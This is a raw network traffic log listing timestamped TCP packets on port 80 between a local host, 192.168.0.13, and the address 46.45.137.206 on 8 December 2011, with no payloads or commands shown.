Dec 8, 2011 14:53:30.584633112 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.585108042 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.585123062 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.585371971 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.586098909 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611028910 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611398935 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.611413956 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611764908 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.647629976 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.673839092 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.674315929 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.674330950 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.674593925 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.699733973 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.764745951 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.765362978 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.765377998 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.765748024 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.780293941 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.790851116 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.791279078 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.791294098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903214931 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903399944 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903631926 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.903646946 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903737068 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.903974056 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.936616898 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.937061071 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.937073946 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.937163115 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.999191046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.999759912 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.999778986 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.999871016 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.110933065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.111337900 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.111354113 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.139271975 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.139667034 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.139682055 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.217602015 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.218008041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.218023062 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.413788080 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.170098066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.263475895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.263845921 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.263864994 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.342242002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.342653036 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.342669964 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.368192911 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.368686914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.368700981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.511097908 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:35.919351101 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:35.919372082 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:36.869817972 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:36.988146067 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:36.988745928 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.048562050 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.049038887 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.049055099 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.049303055 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.074551105 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.207882881 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.207895994 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.222574949 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.222976923 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.222990990 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.223241091 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.248506069 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.275005102 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.275727987 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.275742054 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.276040077 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.300928116 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.387283087 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.387707949 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.445933104 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.446342945 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.446768045 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.446783066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.447037935 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.472304106 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.472311020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.472801924 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.514595032 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.515032053 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.515047073 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.515117884 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.648313999 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.648327112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.661541939 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.661911964 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.661926031 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.668044090 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.668473959 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.672580957 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688008070 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688518047 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.688530922 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688781977 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.692429066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699204922 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699656010 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.699668884 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699918032 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.719062090 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.719069004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.719486952 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.725276947 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.725646973 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.725660086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837115049 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837688923 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.837704897 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837974072 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.863145113 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.866724968 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.867116928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.867130041 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.867377043 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.889672041 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.889678955 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.890093088 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.893138885 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893260002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893524885 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.893537998 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893630981 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.915936947 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.916049004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.916310072 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.919698000 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.919864893 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.919871092 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.920090914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.920337915 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.942514896 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.942955971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.942970037 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.943212986 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.019594908 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021070004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021457911 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.021473885 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021704912 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.047221899 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.047229052 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.047631979 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.063395023 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.063826084 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.063839912 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.064090014 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.067008018 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.067014933 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.067413092 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.089785099 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090076923 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090162992 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.090176105 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090492010 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.090588093 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.193144083 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.193562984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.193577051 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.193661928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.219357014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.219717026 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.219729900 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.273601055 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.273963928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.296684980 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.299949884 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.300450087 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.300463915 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.300705910 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.342946053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.357654095 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.358019114 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.358033895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.383924961 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.384335995 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.384350061 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.384596109 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.398792982 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410022020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410509109 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.410521984 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410765886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.413557053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.425359011 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.425839901 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.425853014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.426052094 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.427119970 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.436567068 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.436939955 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.436955929 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.440047026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.440392971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.465553045 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.466949940 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.467647076 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468005896 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.468019009 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468251944 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.468597889 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468605995 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468991995 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.469458103 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.469789028 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.469801903 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.493931055 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494297981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494326115 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.494339943 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494611025 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.494700909 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.558664083 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.562355042 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649246931 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649662018 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.649676085 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649957895 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.654150009 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.654156923 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.654597998 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.654701948 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.680207014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.760560989 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.760981083 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.760996103 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.761221886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.812383890 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.838617086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.838845968 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.838861942 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.849030972 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.867062092 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.886723042 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.887115955 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.887131929 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893246889 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893645048 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.893659115 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893831968 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.957815886 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984148026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984522104 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.984538078 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984838009 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.997536898 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.010756969 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.011149883 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.011162043 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.011404991 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.028698921 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.037338018 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.037731886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.037744999 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.038062096 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.063354015 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.089610100 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.089992046 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.090004921 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.115775108 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.116157055 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.116169930 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.116461039 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.121876955 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142225981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142642021 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.142653942 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142959118 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.145559072 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179416895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179799080 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.179811001 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179835081 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.180147886 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.180366993 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.180377960 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.180764914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.195022106 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235548019 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235797882 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.235815048 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235963106 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.247214079 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258610964 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258826971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.258841991 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258995056 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.269526958 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278548002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278846979 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.278861046 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278956890 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.279074907 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.279088020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.279201984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.298046112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298094988 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298371077 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.298383951 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298410892 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.313846111 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.314166069 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.314177990 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.314383984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.314397097 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.330641031 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.331027985 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.331039906 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.331219912 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.335658073 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.335843086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.335935116 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.336266041 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.336280107 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.336932898 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.358396053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.358947039 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.359293938 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.359308958 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.359529018 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.361733913 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386248112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386624098 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.386639118 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386699915 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.388433933 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.388784885 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.388797998 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.389012098 CET 1064 80 192.168.0.13 46.45.137.206
